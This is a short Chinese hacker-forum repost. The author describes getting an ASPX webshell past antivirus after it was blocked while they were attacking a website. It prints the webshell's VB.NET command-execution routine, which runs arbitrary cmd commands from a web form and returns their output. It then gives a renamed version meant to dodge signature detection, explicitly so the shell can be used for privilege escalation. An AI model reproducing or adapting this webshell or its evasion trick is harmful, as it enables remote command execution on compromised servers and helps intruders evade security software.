今天看到华夏BLOG被X了。。。顺着留着的地址去看了。。。
有篇文章转过来。。。唉,我还是太菜
今天黑站的时候,经常用的aspx马怎么也上传不了,断定是被杀了。
要提权就得用aspx马,怎么办呢?网上找不到免杀的马。无赖之下,只有找出马中的特征码。
尝试了好久。终于找到了。LOOK:
Sub RunCMD(Src As Object, E As EventArgs)
Dim myProcess As New Process()
Dim myProcessStartInfo As New ProcessStartInfo(cmdPath.Text)
myProcessStartInfo.UseShellExecute = False
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments="/c " & Cmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,">","<")
mystring=replace(mystring,"<",">")
result.text="Command = " & Cmd.text & vbcrlf & "<ul class='td3'><pre>" & mystring & "</pre></ul>"
Cmd.text=""
End Sub |
就是这段代码被定义了。准确的说是其中的myProcessStartInfo.RedirectStandardOutput = true这句有问题。
可是要提权就要用到cmd.net ,删了还是不行。我的解决方法是把myProcess替换,比如上面代码可以替换成:
Sub RunCMD(Src As Object, E As EventArgs)
Dim myRedzz As New Process()
Dim myRedzzStartInfo As New ProcessStartInfo(cmdPath.Text)
myRedzzStartInfo.UseShellExecute = False
myRedzzStartInfo.RedirectStandardOutput = true
myRedzz.StartInfo = myRedzzStartInfo
myRedzzStartInfo.Arguments="/c " & Cmd.text
myRedzz.Start()
Dim myStreamReader As StreamReader = myRedzz.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myRedzz.Close()
mystring=replace(mystring,">","<")
mystring=replace(mystring,"<",">")
result.text="Command = " & Cmd.text & vbcrlf & "<ul class='td3'><pre>" & mystring & "</pre></ul>"
Cmd.text=""
End Sub |
其中把myProcess替换成myRedzz,这样就达到了免杀效果。
可是不是说就绝对免杀了。任何杀毒软件都有不同,需要不断尝试和探索。 |
